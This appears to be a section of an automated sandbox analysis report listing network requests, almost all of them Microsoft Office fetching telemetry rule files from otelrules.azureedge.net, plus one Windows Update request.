Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KpNnL6yXzLT7T33&MD=H6NOomws HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
